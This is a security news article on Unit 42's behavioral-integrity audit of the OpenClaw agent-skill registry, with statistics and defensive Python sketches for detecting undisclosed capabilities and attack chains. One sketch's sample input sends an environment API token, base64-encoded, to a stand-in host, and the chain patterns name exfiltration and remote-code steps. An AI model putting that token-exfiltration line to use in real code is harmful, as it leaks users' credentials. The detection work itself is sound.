Palo Alto Networks Unit 42 Audits All 49,943 OpenClaw Skills, Finds 80% Have Undisclosed Behaviors

Palo Alto Networks’ Unit 42 security team crawled the entire OpenClaw agent-skill registry in early 2026 and ran a new automated audit methodology across all 49,943 listed skills. The results, published June 11, found that 80% of skills (39,933) exhibited at least one mismatch between their declared behavior and their actual behavior. A smaller but more dangerous slice, 5% of the registry (2,490 skills), carried multi-stage attack chains capable of credential theft, remote code execution, or silent data exfiltration.

What Unit 42 Built

The research introduces Behavioral Integrity Verification (BIV), an audit methodology that compares what a skill claims to do against what it actually does across three surfaces: metadata, executable code, and natural-language instructions. The methodology uses a fixed taxonomy of 29 capabilities organized into seven families covering network access, file system operations, process execution, environment variables, encoding, credentials, and instruction-level threats.

Two parallel analysis tracks populate the taxonomy. A declared track reads the metadata using deterministic parsers for structured fields and an LLM for natural-language descriptions. An actual track reads the code via static analyzers using AST-level taint analysis across Python, JavaScript, and shell, while a separate LLM reads natural-language instructions to surface prompt-injection patterns that traditional parsers miss, according to Unit 42.
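To make the actual track concrete, here is a minimal sketch of its simplest ingredient: mapping call sites in Python source to capability labels with the standard-library ast module. It is not Unit 42's implementation. The CALL_CAPABILITIES table, its labels, and the helper names are hypothetical. Unlike the AST-level taint analysis the research describes, this sketch only recognizes call names and does not follow data from one call to the next.

```python
from __future__ import annotations

import ast

# Hypothetical call-name-to-capability table. These labels are illustrative
# and are not Unit 42's 29-capability taxonomy.
CALL_CAPABILITIES = {
    "open": "file_access",
    "requests.get": "network_fetch",
    "requests.post": "network_send",
    "subprocess.run": "process_exec",
    "os.getenv": "env_read",
    "base64.b64encode": "encode",
    "eval": "dynamic_eval",
    "exec": "dynamic_eval",
}


def dotted_name(node: ast.AST) -> str | None:
    """Turn a Name/Attribute chain such as requests.post into 'requests.post'."""
    parts: list[str] = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None  # e.g. calls on subscripts or on the result of another call


def actual_capabilities(source: str) -> set[str]:
    """Map every recognized call in Python source to a capability label.

    The code is parsed, never executed. Import aliases (import requests as r)
    and data flow between calls are not tracked.
    """
    found: set[str] = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            label = CALL_CAPABILITIES.get(dotted_name(node.func))
            if label:
                found.add(label)
    return found


sample = """
import base64, os, requests
token = os.getenv("API_TOKEN")
requests.post("https://example.invalid/collect", data=base64.b64encode(token.encode()))
"""
print(sorted(actual_capabilities(sample)))  # ['encode', 'env_read', 'network_send']
```

A real analyzer would also resolve aliases and trace whether the environment value actually reaches the network call, which is the gap taint analysis closes.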

A skill passes when its actual capability set fits inside its declared capability set. It fails when it does something it never disclosed.
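The pass/fail rule amounts to a subset test. Here is a minimal Python sketch, assuming both tracks have already reduced a skill to sets of capability labels. The labels, IntegrityResult, and check_integrity are hypothetical names. The sketch also reports declared-but-unused capabilities, which do not cause a failure under this rule.

```python
from __future__ import annotations

from dataclasses import dataclass


@dataclass(frozen=True)
class IntegrityResult:
    passed: bool
    undisclosed: frozenset[str]  # observed but never declared: causes failure
    unused: frozenset[str]       # declared but never observed: reported only


def check_integrity(declared: set[str], actual: set[str]) -> IntegrityResult:
    """Pass only if the actual capability set is a subset of the declared set."""
    undisclosed = frozenset(actual - declared)
    unused = frozenset(declared - actual)
    return IntegrityResult(passed=not undisclosed, undisclosed=undisclosed, unused=unused)


result = check_integrity(
    declared={"network_fetch", "file_access"},
    actual={"network_fetch", "encode", "network_send"},
)
print(result.passed)               # False
print(sorted(result.undisclosed))  # ['encode', 'network_send']
print(sorted(result.unused))       # ['file_access']
```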

The Numbers

Applied at registry scale, BIV surfaced 250,706 behavioral deviations across the 49,943 skills. A clustering pass over deviation explanations produced 137 distinct categories and four novel compound threat types that Unit 42 describes as multi-step patterns:

Exfiltration chains: file read, base64 encode, network send
Remote code execution chains: download, write, execute
Code obfuscation: encoding chain into dynamic eval
Data lineage violations: file read into file write (mostly benign pipeline boilerplate)

The threat, as Unit 42 frames it, lives in the chain rather than in any individual link. A scanner that checks one capability at a time sees a file read in one row and a network send in another and, judging each in isolation, flags neither. BIV’s contribution is connecting them.
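One way to illustrate the chain idea is an in-order subsequence match over a skill's sequence of capability events. This is a simplified stand-in, not BIV's method. The capability labels and the CHAIN_PATTERNS table are hypothetical, and the sketch checks only ordering, whereas the research links steps through taint analysis that tracks actual data flow.

```python
from __future__ import annotations

# Compound patterns named by Unit 42, written with hypothetical capability labels.
CHAIN_PATTERNS: dict[str, tuple[str, ...]] = {
    "exfiltration": ("file_read", "encode", "network_send"),
    "remote_code_execution": ("network_fetch", "file_write", "process_exec"),
    "code_obfuscation": ("encode", "dynamic_eval"),
    "data_lineage": ("file_read", "file_write"),
}


def contains_in_order(events: list[str], pattern: tuple[str, ...]) -> bool:
    """True if the pattern's steps occur in events in order, gaps allowed."""
    remaining = iter(events)
    # `step in remaining` consumes the iterator up to the first match,
    # so each later step must be found after the previous one.
    return all(step in remaining for step in pattern)


def detect_chains(events: list[str]) -> list[str]:
    """Return the names of every compound pattern present in the event trace."""
    return [name for name, pattern in CHAIN_PATTERNS.items()
            if contains_in_order(events, pattern)]


trace = ["env_read", "file_read", "encode", "network_send"]
print(detect_chains(trace))  # ['exfiltration']
```

A per-capability check would treat env_read, file_read, encode, and network_send as four unrelated rows; matching them as an ordered sequence is what surfaces the exfiltration pattern.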

Sloppy Documentation, Not Mostly Malice

An intent classifier applied to 163,754 clustered deviations found that 81.1% traced to developer oversight: documentation errors, legitimate helper code, unused declarations, and framework dependencies. The remaining 18.9% traced to adversarial intent, with data theft and espionage accounting for 60% of the adversarial total, according to the research.

The registry breaks into three governance tiers. The top tier, 5.0% of the registry (2,490 skills), carries multi-stage attack chains and warrants mandatory security review. A middle tier, 16.8% of the registry, carries single-stage adversarial deviations that warrant contextual review. A third tier, 72.5% of the registry, shows benign mismatches that call for documentation outreach rather than security intervention.
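The tiering reads as a severity-ordered routing rule. The sketch below assumes each deviation already carries an intent verdict and a multi-stage-chain flag. The Deviation and Tier types and the assign_tier function are hypothetical, and the research does not publish its exact routing logic.

```python
from __future__ import annotations

from dataclasses import dataclass
from enum import Enum


@dataclass(frozen=True)
class Deviation:
    capability: str
    adversarial: bool          # verdict from an intent classifier (assumed input)
    in_multistage_chain: bool  # e.g. set by a chain detector (assumed input)


class Tier(Enum):
    MANDATORY_SECURITY_REVIEW = "multi-stage attack chain"
    CONTEXTUAL_REVIEW = "single-stage adversarial deviation"
    DOCUMENTATION_OUTREACH = "benign mismatch"


def assign_tier(deviations: list[Deviation]) -> Tier | None:
    """Route a skill to the most severe tier any of its deviations triggers."""
    if not deviations:
        return None  # declared and actual behavior match: nothing to route
    adversarial = [d for d in deviations if d.adversarial]
    if any(d.in_multistage_chain for d in adversarial):
        return Tier.MANDATORY_SECURITY_REVIEW
    if adversarial:
        return Tier.CONTEXTUAL_REVIEW
    return Tier.DOCUMENTATION_OUTREACH


skill = [
    Deviation("file_read", adversarial=False, in_multistage_chain=False),
    Deviation("network_send", adversarial=True, in_multistage_chain=False),
]
print(assign_tier(skill))  # Tier.CONTEXTUAL_REVIEW
```

Checking the most severe condition first means a single adversarial chain outweighs any number of benign mismatches in the same skill.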

The Supply Chain Comparison

Unit 42 frames the current state of the OpenClaw skill ecosystem as comparable to where mobile app stores and browser extension marketplaces were a decade ago: extensibility has outpaced the supply-chain audit primitives that should gate it. Anyone can publish a skill to the public registry. Anyone can install one into a production agent. According to Unit 42, no automated tool had previously verified what a skill does before it gains privileged access to the credentials, files, and shell commands inside that agent.

The research recommends that security teams running LLM agents in production inventory the third-party skills they have installed and require behavioral-integrity checks before installation rather than after. Palo Alto Networks points to its Prisma AIRS (AI Runtime Security) product as its own mitigation layer for this class of risk.

The research was authored by Yuhao Wu, Tony Li, and Hongliang Liu of the Unit 42 team.
